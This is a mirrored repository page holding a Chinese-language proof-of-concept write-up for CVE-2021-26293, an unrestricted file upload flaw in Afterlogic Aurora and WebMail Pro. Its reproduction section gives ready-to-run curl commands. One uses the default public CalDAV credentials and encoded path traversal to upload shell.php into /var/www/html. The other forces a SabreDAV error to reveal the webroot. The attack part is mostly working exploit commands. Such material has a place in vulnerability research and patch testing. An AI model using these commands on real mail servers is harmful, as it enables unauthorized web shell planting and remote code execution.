admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

34 lines
1.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293
## 漏洞描述
该漏洞是由于Afterlogic Aurora & WebMail Pro中对上传的文件过滤和限制存在缺陷攻击者可以通过上传恶意文件从而执行任意代码。
参考链接:
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26293
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26293-rce-via-public-unrestricted-file-upload-vulnerability.md
- https://forum.ywhack.com/thread-115325-1-8.html
## 漏洞影响
```
WebMail Pro ≤ 7.7.9
Afterlogic Aurora ≤ 7.7.9
```
## 漏洞复现
```bash
curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"
```
默认路径为/var/www/html也可能更改配置为其它路径可以尝试其它方式获取。
```bash
curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
//使用无效路径获取SabreDAV错误查看Webroot路径
```
Reference in New Issue View Git Blame Copy Permalink